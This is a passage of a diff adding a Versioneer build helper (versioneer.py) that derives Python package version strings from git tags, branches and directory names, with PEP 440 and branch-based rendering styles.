+    if not (os.path.exists(setup_py) or os.path.exists(versioneer_py)):
+        err = (""Versioneer was unable to find the project root directory. ""
+               ""Versioneer requires setup.py to be executed from ""
+               ""its immediate directory (like 'python setup.py COMMAND'), ""
+               ""or in a way that lets it use sys.argv[0] to find the root ""
+               ""(like 'python path/to/setup.py COMMAND')."")
+        raise VersioneerBadRootError(err)
+    try:
+        # Certain runtime workflows (setup.py install/develop in a setuptools
+        # tree) execute all dependencies in a single python process, so
+        # ""versioneer"" may be imported multiple times, and python's shared
+        # module-import table will cache the first one. So we can't use
+        # os.path.dirname(__file__), as that will find whichever
+        # versioneer.py was first imported, even in later projects.
+        me = os.path.realpath(os.path.abspath(__file__))
+        if os.path.splitext(me)[0] != os.path.splitext(versioneer_py)[0]:
+            print(""Warning: build in %s is using versioneer.py from %s""
+                  % (os.path.dirname(me), versioneer_py))
+    except NameError:
+        pass
+    return root
+
+
+def get_config_from_root(root):
+    """"""Read the project setup.cfg file to determine Versioneer config.""""""
+    # This might raise EnvironmentError (if setup.cfg is missing), or
+    # configparser.NoSectionError (if it lacks a [versioneer] section), or
+    # configparser.NoOptionError (if it lacks ""VCS=""). See the docstring at
+    # the top of versioneer.py for instructions on writing your setup.cfg .
+ setup_cfg = os.path.join(root, ""setup.cfg"") + parser = configparser.SafeConfigParser() + with open(setup_cfg, ""r"") as f: + parser.readfp(f) + VCS = parser.get(""versioneer"", ""VCS"") # mandatory + + def get(parser, name): + if parser.has_option(""versioneer"", name): + return parser.get(""versioneer"", name) + return None + cfg = VersioneerConfig() + cfg.VCS = VCS + cfg.style = get(parser, ""style"") or """" + cfg.versionfile_source = get(parser, ""versionfile_source"") + cfg.versionfile_build = get(parser, ""versionfile_build"") + cfg.tag_prefix = get(parser, ""tag_prefix"") + if cfg.tag_prefix in (""''"", '""""'): + cfg.tag_prefix = """" + cfg.parentdir_prefix = get(parser, ""parentdir_prefix"") + cfg.verbose = get(parser, ""verbose"") + return cfg + + +class NotThisMethod(Exception): + + """"""Exception raised if a method is not valid for the current scenario."""""" + +# these dictionaries contain VCS-specific tools +LONG_VERSION_PY = {} +HANDLERS = {} + + +def register_vcs_handler(vcs, method): # decorator + """"""Decorator to mark a method as the handler for a particular VCS."""""" + def decorate(f): + """"""Store f in HANDLERS[vcs][method]."""""" + if vcs not in HANDLERS: + HANDLERS[vcs] = {} + HANDLERS[vcs][method] = f + return f + return decorate + + +def run_command(commands, args, cwd=None, verbose=False, hide_stderr=False): + """"""Call the given command(s)."""""" + assert isinstance(commands, list) + p = None + for c in commands: + try: + dispcmd = str([c] + args) + # remember shell=False, so use git.cmd on windows, not just git + p = subprocess.Popen([c] + args, cwd=cwd, stdout=subprocess.PIPE, + stderr=(subprocess.PIPE if hide_stderr + else None)) + break + except EnvironmentError: + e = sys.exc_info()[1] + if e.errno == errno.ENOENT: + continue + if verbose: + print(""unable to run %s"" % dispcmd) + print(e) + return None + else: + if verbose: + print(""unable to find command, tried %s"" % (commands,)) + return None + stdout = p.communicate()[0].strip() + if sys.version_info[0] >= 3: + stdout = stdout.decode() + if p.returncode != 0: + if verbose: + print(""unable to run %s (error)"" % dispcmd) + return None + return stdout +LONG_VERSION_PY['git'] = r''' +# This file helps to compute a version number in source trees obtained from +# git-archive tarball (such as those provided by githubs download-from-tag +# feature). Distribution tarballs (built by setup.py sdist) and build +# directories (produced by setup.py build) will contain a much shorter file +# that just contains the computed version number. + +# This file is released into the public domain. Generated by +# versioneer-0.15+dev (https://github.com/warner/python-versioneer) + +""""""Git implementation of _version.py."""""" + +import errno +import os +import re +import subprocess +import sys + + +def get_keywords(): + """"""Get the keywords needed to look up the version information."""""" + # these strings will be replaced by git during git-archive. + # setup.py/versioneer.py will grep for the variable names, so they must + # each be defined on a line of their own. _version.py will just call + # get_keywords(). 
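+    # (These placeholders are rewritten by 'git archive' because
+    # _version.py is marked with the export-subst attribute in
+    # .gitattributes; see do_vcs_install in versioneer.py.)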
+ git_refnames = ""%(DOLLAR)sFormat:%%d%(DOLLAR)s"" + git_full = ""%(DOLLAR)sFormat:%%H%(DOLLAR)s"" + keywords = {""refnames"": git_refnames, ""full"": git_full} + return keywords + + +class VersioneerConfig: + + """"""Container for Versioneer configuration parameters."""""" + + +def get_config(): + """"""Create, populate and return the VersioneerConfig() object."""""" + # these strings are filled in when 'setup.py versioneer' creates + # _version.py + cfg = VersioneerConfig() + cfg.VCS = ""git"" + cfg.style = ""%(STYLE)s"" + cfg.tag_prefix = ""%(TAG_PREFIX)s"" + cfg.parentdir_prefix = ""%(PARENTDIR_PREFIX)s"" + cfg.versionfile_source = ""%(VERSIONFILE_SOURCE)s"" + cfg.verbose = False + return cfg + + +class NotThisMethod(Exception): + + """"""Exception raised if a method is not valid for the current scenario."""""" + + +LONG_VERSION_PY = {} +HANDLERS = {} + + +def register_vcs_handler(vcs, method): # decorator + """"""Decorator to mark a method as the handler for a particular VCS."""""" + def decorate(f): + """"""Store f in HANDLERS[vcs][method]."""""" + if vcs not in HANDLERS: + HANDLERS[vcs] = {} + HANDLERS[vcs][method] = f + return f + return decorate + + +def run_command(commands, args, cwd=None, verbose=False, hide_stderr=False): + """"""Call the given command(s)."""""" + assert isinstance(commands, list) + p = None + for c in commands: + try: + dispcmd = str([c] + args) + # remember shell=False, so use git.cmd on windows, not just git + p = subprocess.Popen([c] + args, cwd=cwd, stdout=subprocess.PIPE, + stderr=(subprocess.PIPE if hide_stderr + else None)) + break + except EnvironmentError: + e = sys.exc_info()[1] + if e.errno == errno.ENOENT: + continue + if verbose: + print(""unable to run %%s"" %% dispcmd) + print(e) + return None + else: + if verbose: + print(""unable to find command, tried %%s"" %% (commands,)) + return None + stdout = p.communicate()[0].strip() + if sys.version_info[0] >= 3: + stdout = stdout.decode() + if p.returncode != 0: + if verbose: + print(""unable to run %%s (error)"" %% dispcmd) + return None + return stdout + + +def versions_from_parentdir(parentdir_prefix, root, verbose): + """"""Try to determine the version from the parent directory name. + + Source tarballs conventionally unpack into a directory that includes + both the project name and a version string. + """""" + dirname = os.path.basename(root) + if not dirname.startswith(parentdir_prefix): + if verbose: + print(""guessing rootdir is '%%s', but '%%s' doesn't start with "" + ""prefix '%%s'"" %% (root, dirname, parentdir_prefix)) + raise NotThisMethod(""rootdir doesn't start with parentdir_prefix"") + return {""version"": dirname[len(parentdir_prefix):], + ""full-revisionid"": None, + ""dirty"": False, ""error"": None} + + +@register_vcs_handler(""git"", ""get_keywords"") +def git_get_keywords(versionfile_abs): + """"""Extract version information from the given file."""""" + # the code embedded in _version.py can just fetch the value of these + # keywords. When used from setup.py, we don't want to import _version.py, + # so we do it with a regexp instead. This function is not used from + # _version.py. 
+ keywords = {} + try: + f = open(versionfile_abs, ""r"") + for line in f.readlines(): + if line.strip().startswith(""git_refnames =""): + mo = re.search(r'=\s*""(.*)""', line) + if mo: + keywords[""refnames""] = mo.group(1) + if line.strip().startswith(""git_full =""): + mo = re.search(r'=\s*""(.*)""', line) + if mo: + keywords[""full""] = mo.group(1) + f.close() + except EnvironmentError: + pass + return keywords + + +@register_vcs_handler(""git"", ""keywords"") +def git_versions_from_keywords(keywords, tag_prefix, verbose): + """"""Get version information from git keywords."""""" + if not keywords: + raise NotThisMethod(""no keywords at all, weird"") + refnames = keywords[""refnames""].strip() + if refnames.startswith(""$Format""): + if verbose: + print(""keywords are unexpanded, not using"") + raise NotThisMethod(""unexpanded keywords, not a git-archive tarball"") + refs = [r.strip() for r in refnames.strip(""()"").split("","")] + # starting in git-1.8.3, tags are listed as ""tag: foo-1.0"" instead of + # just ""foo-1.0"". If we see a ""tag: "" prefix, prefer those. + TAG = ""tag: "" + tags = set([r[len(TAG):] for r in refs if r.startswith(TAG)]) + if not tags: + # Either we're using git < 1.8.3, or there really are no tags. We use + # a heuristic: assume all version tags have a digit. The old git %%d + # expansion behaves like git log --decorate=short and strips out the + # refs/heads/ and refs/tags/ prefixes that would let us distinguish + # between branches and tags. By ignoring refnames without digits, we + # filter out many common branch names like ""release"" and + # ""stabilization"", as well as ""HEAD"" and ""master"". + tags = set([r for r in refs if re.search(r'\d', r)]) + if verbose: + print(""discarding '%%s', no digits"" %% "","".join(set(refs) - tags)) + if verbose: + print(""likely tags: %%s"" %% "","".join(sorted(tags))) + for ref in sorted(tags): + # sorting will prefer e.g. ""2.0"" over ""2.0rc1"" + if ref.startswith(tag_prefix): + r = ref[len(tag_prefix):] + if verbose: + print(""picking %%s"" %% r) + return {""version"": r, + ""full-revisionid"": keywords[""full""].strip(), + ""dirty"": False, ""error"": None, ""branch"": None + } + # no suitable tags, so version is ""0+unknown"", but full hex is still there + if verbose: + print(""no suitable tags, using unknown + full revision id"") + return {""version"": ""0+unknown"", + ""full-revisionid"": keywords[""full""].strip(), + ""dirty"": False, ""error"": ""no suitable tags"", + ""branch"": None} + + +@register_vcs_handler(""git"", ""pieces_from_vcs"") +def git_pieces_from_vcs(tag_prefix, root, verbose, run_command=run_command): + """"""Get version from 'git describe' in the root of the source tree. + + This only gets called if the git-archive 'subst' keywords were *not* + expanded, and _version.py hasn't already been rewritten with a short + version string, meaning we're inside a checked out source tree. + """""" + if not os.path.exists(os.path.join(root, "".git"")): + if verbose: + print(""no .git in %%s"" %% root) + raise NotThisMethod(""no .git directory"") + + GITS = [""git""] + if sys.platform == ""win32"": + GITS = [""git.cmd"", ""git.exe""] + # if there is a tag matching tag_prefix, this yields TAG-NUM-gHEX[-dirty] + # if there isn't one, this yields HEX[-dirty] (no NUM). Note, for git v1.7 + # and below, it is necessary to run ""git update-index --refresh"" first. 
+ describe_out = run_command(GITS, [""describe"", ""--tags"", ""--dirty"", + ""--always"", ""--long"", + ""--match"", ""%%s*"" %% tag_prefix], + cwd=root) + # --long was added in git-1.5.5 + if describe_out is None: + raise NotThisMethod(""'git describe' failed"") + describe_out = describe_out.strip() + full_out = run_command(GITS, [""rev-parse"", ""HEAD""], cwd=root) + if full_out is None: + raise NotThisMethod(""'git rev-parse' failed"") + full_out = full_out.strip() + + pieces = {} + pieces[""long""] = full_out + pieces[""short""] = full_out[:7] # maybe improved later + pieces[""error""] = None + + # abbrev-ref available with git >= 1.7 + branch_name = run_command(GITS, [""rev-parse"", ""--abbrev-ref"", ""HEAD""], + cwd=root).strip() + if branch_name == 'HEAD': + branches = run_command(GITS, [""branch"", ""--contains""], + cwd=root).split('\n') + branches = [branch[2:] for branch in branches if branch[4:5] != '('] + if 'master' in branches: + branch_name = 'master' + elif not branches: + branch_name = None + else: + # Pick the first branch that is returned. Good or bad. + branch_name = branches[0] + + pieces['branch'] = branch_name + + # parse describe_out. It will be like TAG-NUM-gHEX[-dirty] or HEX[-dirty] + # TAG might have hyphens. + git_describe = describe_out + + # look for -dirty suffix + dirty = git_describe.endswith(""-dirty"") + pieces[""dirty""] = dirty + if dirty: + git_describe = git_describe[:git_describe.rindex(""-dirty"")] + + # now we have TAG-NUM-gHEX or HEX + + if ""-"" in git_describe: + # TAG-NUM-gHEX + mo = re.search(r'^(.+)-(\d+)-g([0-9a-f]+)$', git_describe) + if not mo: + # unparseable. Maybe git-describe is misbehaving? + pieces[""error""] = (""unable to parse git-describe output: '%%s'"" + %% describe_out) + return pieces + + # tag + full_tag = mo.group(1) + if not full_tag.startswith(tag_prefix): + if verbose: + fmt = ""tag '%%s' doesn't start with prefix '%%s'"" + print(fmt %% (full_tag, tag_prefix)) + pieces[""error""] = (""tag '%%s' doesn't start with prefix '%%s'"" + %% (full_tag, tag_prefix)) + return pieces + pieces[""closest-tag""] = full_tag[len(tag_prefix):] + + # distance: number of commits since tag + pieces[""distance""] = int(mo.group(2)) + + # commit: short hex revision ID + pieces[""short""] = mo.group(3) + + else: + # HEX: no tags + pieces[""closest-tag""] = None + count_out = run_command(GITS, [""rev-list"", ""HEAD"", ""--count""], + cwd=root) + pieces[""distance""] = int(count_out) # total number of commits + + return pieces + + +# Default matches v1.2.x, maint/1.2.x, 1.2.x, 1.x etc. +default_maint_branch_regexp = "".*([0-9]+\.)+x$"" + + +def plus_or_dot(pieces): + """"""Return a + if we don't already have one, else return a ."""""" + if ""+"" in pieces.get(""closest-tag"", """"): + return ""."" + return ""+"" + + +def render_pep440(pieces): + """"""Build up version string, with post-release ""local version identifier"". + + Our goal: TAG[+DISTANCE.gHEX[.dirty]] . Note that if you + get a tagged build and then dirty it, you'll get TAG+0.gHEX.dirty + + Exceptions: + 1: no tags. git_describe was just HEX. 
0+untagged.DISTANCE.gHEX[.dirty]
+    """"""
+    if pieces[""closest-tag""]:
+        rendered = pieces[""closest-tag""]
+        if pieces[""distance""] or pieces[""dirty""]:
+            rendered += plus_or_dot(pieces)
+            rendered += ""%%d.g%%s"" %% (pieces[""distance""], pieces[""short""])
+            if pieces[""dirty""]:
+                rendered += "".dirty""
+    else:
+        # exception #1
+        rendered = ""0+untagged.%%d.g%%s"" %% (pieces[""distance""],
+                                          pieces[""short""])
+        if pieces[""dirty""]:
+            rendered += "".dirty""
+    return rendered
+
+
+def render_pep440_pre(pieces):
+    """"""TAG[.post.devDISTANCE] -- No -dirty.
+
+    Exceptions:
+    1: no tags. 0.post.devDISTANCE
+    """"""
+    if pieces[""closest-tag""]:
+        rendered = pieces[""closest-tag""]
+        if pieces[""distance""]:
+            rendered += "".post.dev%%d"" %% pieces[""distance""]
+    else:
+        # exception #1
+        rendered = ""0.post.dev%%d"" %% pieces[""distance""]
+    return rendered
+
+
+def render_pep440_post(pieces):
+    """"""TAG[.postDISTANCE[.dev0]+gHEX] .
+
+    The "".dev0"" means dirty. Note that .dev0 sorts backwards
+    (a dirty tree will appear ""older"" than the corresponding clean one),
+    but you shouldn't be releasing software with -dirty anyways.
+
+    Exceptions:
+    1: no tags. 0.postDISTANCE[.dev0]
+    """"""
+    if pieces[""closest-tag""]:
+        rendered = pieces[""closest-tag""]
+        if pieces[""distance""] or pieces[""dirty""]:
+            rendered += "".post%%d"" %% pieces[""distance""]
+            if pieces[""dirty""]:
+                rendered += "".dev0""
+            rendered += plus_or_dot(pieces)
+            rendered += ""g%%s"" %% pieces[""short""]
+    else:
+        # exception #1
+        rendered = ""0.post%%d"" %% pieces[""distance""]
+        if pieces[""dirty""]:
+            rendered += "".dev0""
+        rendered += ""+g%%s"" %% pieces[""short""]
+    return rendered
+
+
+def render_pep440_old(pieces):
+    """"""TAG[.postDISTANCE[.dev0]] .
+
+    The "".dev0"" means dirty.
+
+    Exceptions:
+    1: no tags. 0.postDISTANCE[.dev0]
+    """"""
+    if pieces[""closest-tag""]:
+        rendered = pieces[""closest-tag""]
+        if pieces[""distance""] or pieces[""dirty""]:
+            rendered += "".post%%d"" %% pieces[""distance""]
+            if pieces[""dirty""]:
+                rendered += "".dev0""
+    else:
+        # exception #1
+        rendered = ""0.post%%d"" %% pieces[""distance""]
+        if pieces[""dirty""]:
+            rendered += "".dev0""
+    return rendered
+
+
+def render_git_describe(pieces):
+    """"""TAG[-DISTANCE-gHEX][-dirty].
+
+    Like 'git describe --tags --dirty --always'.
+
+    Exceptions:
+    1: no tags. HEX[-dirty]  (note: no 'g' prefix)
+    """"""
+    if pieces[""closest-tag""]:
+        rendered = pieces[""closest-tag""]
+        if pieces[""distance""]:
+            rendered += ""-%%d-g%%s"" %% (pieces[""distance""], pieces[""short""])
+    else:
+        # exception #1
+        rendered = pieces[""short""]
+    if pieces[""dirty""]:
+        rendered += ""-dirty""
+    return rendered
+
+
+def render_git_describe_long(pieces):
+    """"""TAG-DISTANCE-gHEX[-dirty].
+
+    Like 'git describe --tags --dirty --always --long'.
+    The distance/hash is unconditional.
+
+    Exceptions:
+    1: no tags. HEX[-dirty]  (note: no 'g' prefix)
+    """"""
+    if pieces[""closest-tag""]:
+        rendered = pieces[""closest-tag""]
+        rendered += ""-%%d-g%%s"" %% (pieces[""distance""], pieces[""short""])
+    else:
+        # exception #1
+        rendered = pieces[""short""]
+    if pieces[""dirty""]:
+        rendered += ""-dirty""
+    return rendered
+
+
+def add_one_to_version(version_string, number_index_to_increment=-1):
+    """"""
+    Add one to a version string at the given numeric indices.
+
+    >>> add_one_to_version('v1.2.3')
+    'v1.2.4'
+
+    """"""
+    # Break up the tag by number groups (preserving multi-digit
+    # numbers as multidigit)
+    parts = re.split(""([0-9]+)"", version_string)
+
+    digit_parts = [(i, part) for i, part in enumerate(parts)
+                   if part.isdigit()]
+
+    # Deal with negative indexing.
+    increment_at_index = ((number_index_to_increment + len(digit_parts))
+                          %% len(digit_parts))
+    for n_seen, (i, part) in enumerate(digit_parts):
+        if n_seen == increment_at_index:
+            parts[i] = str(int(part) + 1)
+        elif n_seen > increment_at_index:
+            parts[i] = '0'
+    return ''.join(parts)
+
+
+def render_pep440_branch_based(pieces):
+    # [TAG+1 of minor number][.devDISTANCE][+gHEX]. The git short is
+    # included for dirty.
+
+    # exceptions:
+    # 1: no tags. 0.0.0.devDISTANCE[+gHEX]
+
+    replacements = {' ': '.', '(': '', ')': ''}
+    branch_name = pieces.get('branch')
+    for old, new in replacements.items():
+        branch_name = branch_name.replace(old, new)
+    master = branch_name == 'master'
+    maint = re.match(default_maint_branch_regexp,
+                     branch_name or '')
+
+    # If we are on a tag, just pep440-pre it.
+    if pieces[""closest-tag""] and not (pieces[""distance""] or
+                                      pieces[""dirty""]):
+        rendered = pieces[""closest-tag""]
+    else:
+        # Put a default closest-tag in.
+        if not pieces[""closest-tag""]:
+            pieces[""closest-tag""] = '0.0.0'
+
+        if pieces[""distance""] or pieces[""dirty""]:
+            if maint:
+                rendered = pieces[""closest-tag""]
+                if pieces[""distance""]:
+                    rendered += "".post%%d"" %% pieces[""distance""]
+            else:
+                rendered = add_one_to_version(pieces[""closest-tag""])
+                if pieces[""distance""]:
+                    rendered += "".dev%%d"" %% pieces[""distance""]
+
+            suffix = []
+            # Put the branch name in if it isn't master nor a
+            # maintenance branch.
+            if not (master or maint):
+                suffix.append('%%s' %% (branch_name or 'unknown_branch'))
+
+            if pieces[""dirty""]:
+                suffix.append('g%%s' %% pieces[""short""])
+            rendered += '+%%s' %% ''.join(suffix)
+        else:
+            rendered = pieces[""closest-tag""]
+    return rendered
+
+
+STYLES = {'default': render_pep440,
+          'pep440': render_pep440,
+          'pep440-pre': render_pep440_pre,
+          'pep440-post': render_pep440_post,
+          'pep440-old': render_pep440_old,
+          'git-describe': render_git_describe,
+          'git-describe-long': render_git_describe_long,
+          'pep440-branch-based': render_pep440_branch_based,
+          }
+
+
+def render(pieces, style):
+    """"""Render the given version pieces into the requested style.""""""
+    if pieces[""error""]:
+        return {""version"": ""unknown"",
+                ""full-revisionid"": pieces.get(""long""),
+                ""dirty"": None,
+                ""error"": pieces[""error""]}
+
+    if not style:
+        style = 'default'
+
+    renderer = STYLES.get(style)
+
+    if not renderer:
+        raise ValueError(""unknown style '%%s'"" %% style)
+
+    rendered = renderer(pieces)
+
+    return {""version"": rendered, ""full-revisionid"": pieces[""long""],
+            ""dirty"": pieces[""dirty""], ""error"": None}
+
+
+def get_versions():
+    """"""Get version information or return default if unable to do so.""""""
+    # I am in _version.py, which lives at ROOT/VERSIONFILE_SOURCE. If we have
+    # __file__, we can work backwards from there to the root. Some
+    # py2exe/bbfreeze/non-CPython implementations don't do __file__, in which
+    # case we can only use expanded keywords.
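+    # Each strategy below raises NotThisMethod when it does not apply,
+    # in which case we fall through and try the next one.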
+ + cfg = get_config() + verbose = cfg.verbose + + try: + return git_versions_from_keywords(get_keywords(), cfg.tag_prefix, + verbose) + except NotThisMethod: + pass + + try: + root = os.path.realpath(__file__) + # versionfile_source is the relative path from the top of the source + # tree (where the .git directory might live) to this file. Invert + # this to find the root from __file__. + for i in cfg.versionfile_source.split('/'): + root = os.path.dirname(root) + except NameError: + return {""version"": ""0+unknown"", ""full-revisionid"": None, + ""dirty"": None, + ""error"": ""unable to find root of source tree""} + + try: + pieces = git_pieces_from_vcs(cfg.tag_prefix, root, verbose) + return render(pieces, cfg.style) + except NotThisMethod: + pass + + try: + if cfg.parentdir_prefix: + return versions_from_parentdir(cfg.parentdir_prefix, root, verbose) + except NotThisMethod: + pass + + return {""version"": ""0+unknown"", ""full-revisionid"": None, + ""dirty"": None, + ""error"": ""unable to compute version""} +''' + + +@register_vcs_handler(""git"", ""get_keywords"") +def git_get_keywords(versionfile_abs): + """"""Extract version information from the given file."""""" + # the code embedded in _version.py can just fetch the value of these + # keywords. When used from setup.py, we don't want to import _version.py, + # so we do it with a regexp instead. This function is not used from + # _version.py. + keywords = {} + try: + f = open(versionfile_abs, ""r"") + for line in f.readlines(): + if line.strip().startswith(""git_refnames =""): + mo = re.search(r'=\s*""(.*)""', line) + if mo: + keywords[""refnames""] = mo.group(1) + if line.strip().startswith(""git_full =""): + mo = re.search(r'=\s*""(.*)""', line) + if mo: + keywords[""full""] = mo.group(1) + f.close() + except EnvironmentError: + pass + return keywords + + +@register_vcs_handler(""git"", ""keywords"") +def git_versions_from_keywords(keywords, tag_prefix, verbose): + """"""Get version information from git keywords."""""" + if not keywords: + raise NotThisMethod(""no keywords at all, weird"") + refnames = keywords[""refnames""].strip() + if refnames.startswith(""$Format""): + if verbose: + print(""keywords are unexpanded, not using"") + raise NotThisMethod(""unexpanded keywords, not a git-archive tarball"") + refs = [r.strip() for r in refnames.strip(""()"").split("","")] + # starting in git-1.8.3, tags are listed as ""tag: foo-1.0"" instead of + # just ""foo-1.0"". If we see a ""tag: "" prefix, prefer those. + TAG = ""tag: "" + tags = set([r[len(TAG):] for r in refs if r.startswith(TAG)]) + if not tags: + # Either we're using git < 1.8.3, or there really are no tags. We use + # a heuristic: assume all version tags have a digit. The old git %d + # expansion behaves like git log --decorate=short and strips out the + # refs/heads/ and refs/tags/ prefixes that would let us distinguish + # between branches and tags. By ignoring refnames without digits, we + # filter out many common branch names like ""release"" and + # ""stabilization"", as well as ""HEAD"" and ""master"". + tags = set([r for r in refs if re.search(r'\d', r)]) + if verbose: + print(""discarding '%s', no digits"" % "","".join(set(refs) - tags)) + if verbose: + print(""likely tags: %s"" % "","".join(sorted(tags))) + for ref in sorted(tags): + # sorting will prefer e.g. 
""2.0"" over ""2.0rc1"" + if ref.startswith(tag_prefix): + r = ref[len(tag_prefix):] + if verbose: + print(""picking %s"" % r) + return {""version"": r, + ""full-revisionid"": keywords[""full""].strip(), + ""dirty"": False, ""error"": None, ""branch"": None + } + # no suitable tags, so version is ""0+unknown"", but full hex is still there + if verbose: + print(""no suitable tags, using unknown + full revision id"") + return {""version"": ""0+unknown"", + ""full-revisionid"": keywords[""full""].strip(), + ""dirty"": False, ""error"": ""no suitable tags"", + ""branch"": None} + + +@register_vcs_handler(""git"", ""pieces_from_vcs"") +def git_pieces_from_vcs(tag_prefix, root, verbose, run_command=run_command): + """"""Get version from 'git describe' in the root of the source tree. + + This only gets called if the git-archive 'subst' keywords were *not* + expanded, and _version.py hasn't already been rewritten with a short + version string, meaning we're inside a checked out source tree. + """""" + if not os.path.exists(os.path.join(root, "".git"")): + if verbose: + print(""no .git in %s"" % root) + raise NotThisMethod(""no .git directory"") + + GITS = [""git""] + if sys.platform == ""win32"": + GITS = [""git.cmd"", ""git.exe""] + # if there is a tag matching tag_prefix, this yields TAG-NUM-gHEX[-dirty] + # if there isn't one, this yields HEX[-dirty] (no NUM). Note, for git v1.7 + # and below, it is necessary to run ""git update-index --refresh"" first. + describe_out = run_command(GITS, [""describe"", ""--tags"", ""--dirty"", + ""--always"", ""--long"", + ""--match"", ""%s*"" % tag_prefix], + cwd=root) + # --long was added in git-1.5.5 + if describe_out is None: + raise NotThisMethod(""'git describe' failed"") + describe_out = describe_out.strip() + full_out = run_command(GITS, [""rev-parse"", ""HEAD""], cwd=root) + if full_out is None: + raise NotThisMethod(""'git rev-parse' failed"") + full_out = full_out.strip() + + pieces = {} + pieces[""long""] = full_out + pieces[""short""] = full_out[:7] # maybe improved later + pieces[""error""] = None + + # abbrev-ref available with git >= 1.7 + branch_name = run_command(GITS, [""rev-parse"", ""--abbrev-ref"", ""HEAD""], + cwd=root).strip() + if branch_name == 'HEAD': + branches = run_command(GITS, [""branch"", ""--contains""], + cwd=root).split('\n') + branches = [branch[2:] for branch in branches if branch[4:5] != '('] + if 'master' in branches: + branch_name = 'master' + elif not branches: + branch_name = None + else: + # Pick the first branch that is returned. Good or bad. + branch_name = branches[0] + + pieces['branch'] = branch_name + + # parse describe_out. It will be like TAG-NUM-gHEX[-dirty] or HEX[-dirty] + # TAG might have hyphens. + git_describe = describe_out + + # look for -dirty suffix + dirty = git_describe.endswith(""-dirty"") + pieces[""dirty""] = dirty + if dirty: + git_describe = git_describe[:git_describe.rindex(""-dirty"")] + + # now we have TAG-NUM-gHEX or HEX + + if ""-"" in git_describe: + # TAG-NUM-gHEX + mo = re.search(r'^(.+)-(\d+)-g([0-9a-f]+)$', git_describe) + if not mo: + # unparseable. Maybe git-describe is misbehaving? 
+ pieces[""error""] = (""unable to parse git-describe output: '%s'"" + % describe_out) + return pieces + + # tag + full_tag = mo.group(1) + if not full_tag.startswith(tag_prefix): + if verbose: + fmt = ""tag '%s' doesn't start with prefix '%s'"" + print(fmt % (full_tag, tag_prefix)) + pieces[""error""] = (""tag '%s' doesn't start with prefix '%s'"" + % (full_tag, tag_prefix)) + return pieces + pieces[""closest-tag""] = full_tag[len(tag_prefix):] + + # distance: number of commits since tag + pieces[""distance""] = int(mo.group(2)) + + # commit: short hex revision ID + pieces[""short""] = mo.group(3) + + else: + # HEX: no tags + pieces[""closest-tag""] = None + count_out = run_command(GITS, [""rev-list"", ""HEAD"", ""--count""], + cwd=root) + pieces[""distance""] = int(count_out) # total number of commits + + return pieces + + +def do_vcs_install(manifest_in, versionfile_source, ipy): + """"""Git-specific installation logic for Versioneer. + + For Git, this means creating/changing .gitattributes to mark _version.py + for export-time keyword substitution. + """""" + GITS = [""git""] + if sys.platform == ""win32"": + GITS = [""git.cmd"", ""git.exe""] + files = [manifest_in, versionfile_source] + if ipy: + files.append(ipy) + try: + me = __file__ + if me.endswith("".pyc"") or me.endswith("".pyo""): + me = os.path.splitext(me)[0] + "".py"" + versioneer_file = os.path.relpath(me) + except NameError: + versioneer_file = ""versioneer.py"" + files.append(versioneer_file) + present = False + try: + f = open("".gitattributes"", ""r"") + for line in f.readlines(): + if line.strip().startswith(versionfile_source): + if ""export-subst"" in line.strip().split()[1:]: + present = True + f.close() + except EnvironmentError: + pass + if not present: + f = open("".gitattributes"", ""a+"") + f.write(""%s export-subst\n"" % versionfile_source) + f.close() + files.append("".gitattributes"") + run_command(GITS, [""add"", ""--""] + files) + + +def versions_from_parentdir(parentdir_prefix, root, verbose): + """"""Try to determine the version from the parent directory name. + + Source tarballs conventionally unpack into a directory that includes + both the project name and a version string. + """""" + dirname = os.path.basename(root) + if not dirname.startswith(parentdir_prefix): + if verbose: + print(""guessing rootdir is '%s', but '%s' doesn't start with "" + ""prefix '%s'"" % (root, dirname, parentdir_prefix)) + raise NotThisMethod(""rootdir doesn't start with parentdir_prefix"") + return {""version"": dirname[len(parentdir_prefix):], + ""full-revisionid"": None, + ""dirty"": False, ""error"": None} + +SHORT_VERSION_PY = """""" +# This file was generated by 'versioneer.py' (0.15+dev) from +# revision-control system data, or from the parent directory name of an +# unpacked source archive. Distribution tarballs contain a pre-generated copy +# of this file. 
+
+import json
+import sys
+
+version_json = '''
+%s
+''' # END VERSION_JSON
+
+
+def get_versions():
+    return json.loads(version_json)
+""""""
+
+
+def versions_from_file(filename):
+    """"""Try to determine the version from _version.py if present.""""""
+    try:
+        with open(filename) as f:
+            contents = f.read()
+    except EnvironmentError:
+        raise NotThisMethod(""unable to read _version.py"")
+    mo = re.search(r""version_json = '''\n(.*)''' # END VERSION_JSON"",
+                   contents, re.M | re.S)
+    if not mo:
+        raise NotThisMethod(""no version_json in _version.py"")
+    return json.loads(mo.group(1))
+
+
+def write_to_version_file(filename, versions):
+    """"""Write the given version number to the given _version.py file.""""""
+    os.unlink(filename)
+    contents = json.dumps(versions, sort_keys=True,
+                          indent=1, separators=("","", "": ""))
+    with open(filename, ""w"") as f:
+        f.write(SHORT_VERSION_PY % contents)
+
+    print(""set %s to '%s'"" % (filename, versions[""version""]))
+
+# Default matches v1.2.x, maint/1.2.x, 1.2.x, 1.x etc.
+default_maint_branch_regexp = "".*([0-9]+\.)+x$""
+
+
+def plus_or_dot(pieces):
+    """"""Return a + if we don't already have one, else return a .""""""
+    if ""+"" in pieces.get(""closest-tag"", """"):
+        return "".""
+    return ""+""
+
+
+def render_pep440(pieces):
+    """"""Build up version string, with post-release ""local version identifier"".
+
+    Our goal: TAG[+DISTANCE.gHEX[.dirty]] . Note that if you
+    get a tagged build and then dirty it, you'll get TAG+0.gHEX.dirty
+
+    Exceptions:
+    1: no tags. git_describe was just HEX. 0+untagged.DISTANCE.gHEX[.dirty]
+    """"""
+    if pieces[""closest-tag""]:
+        rendered = pieces[""closest-tag""]
+        if pieces[""distance""] or pieces[""dirty""]:
+            rendered += plus_or_dot(pieces)
+            rendered += ""%d.g%s"" % (pieces[""distance""], pieces[""short""])
+            if pieces[""dirty""]:
+                rendered += "".dirty""
+    else:
+        # exception #1
+        rendered = ""0+untagged.%d.g%s"" % (pieces[""distance""],
+                                          pieces[""short""])
+        if pieces[""dirty""]:
+            rendered += "".dirty""
+    return rendered
+
+
+def render_pep440_pre(pieces):
+    """"""TAG[.post.devDISTANCE] -- No -dirty.
+
+    Exceptions:
+    1: no tags. 0.post.devDISTANCE
+    """"""
+    if pieces[""closest-tag""]:
+        rendered = pieces[""closest-tag""]
+        if pieces[""distance""]:
+            rendered += "".post.dev%d"" % pieces[""distance""]
+    else:
+        # exception #1
+        rendered = ""0.post.dev%d"" % pieces[""distance""]
+    return rendered
+
+
+def render_pep440_post(pieces):
